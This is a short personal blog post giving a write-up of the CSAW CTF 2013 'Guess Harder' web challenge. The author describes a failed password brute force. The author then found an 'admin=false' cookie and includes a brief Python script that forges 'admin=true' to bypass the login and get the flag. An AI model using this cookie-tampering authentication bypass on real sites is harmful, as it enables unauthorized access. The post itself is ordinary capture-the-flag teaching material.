VnutZ Domain
Copyright © 1996 - 2018 [Matthew Vea] - All Rights Reserved

Featured Article

CSAW CTF 2013 - WEB 100 "Guess Harder"

[index] [93 page views]

So there's no way for anybody to play around with WEB100 "Guess Harder" after the fact since the challenge web server is shut down. The challenge provided an IP address - - which showed a short message to the effect of "HA! Bet you can't guess my password.", included a text box, and a submit button. When you guess wrong, the page just recycles.

Admittedly, I did this one the hard way at first by scripting a brute force routine with Python that cycled through all the entries of password dictionary. That thing ran for a long time and produced nothing so I finally opened up WireShark to take a peak. Lo and behold, within the HTTP header was a field @COOKIE: admin=false@. Could it be that easy?

import httplib, urllib
params = urllib.urlencode({'password' : 'password'})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "Cookie": "admin=true\r\n"}
conn = httplib.HTTPConnection("")
conn.request("POST", "/", params, headers)
response = conn.getresponse()
print response.status, response.reason,

Yup. Just telling the server @admin=true@ in the cookie field made it accept the entry and it provided the necessary flag.

More Content You Might Be Interested In Reading:

The venerable Hubble continues to add new and amazing contributions to astronomy.

Or try your hand at fate - use the Pattern Analysis of the MegaMillions Lottery or the Pattern Analysis of the PowerBall Lottery page to pick "smarter" numbers. Remember, you don't have to win the jackpot to win money from the lottery!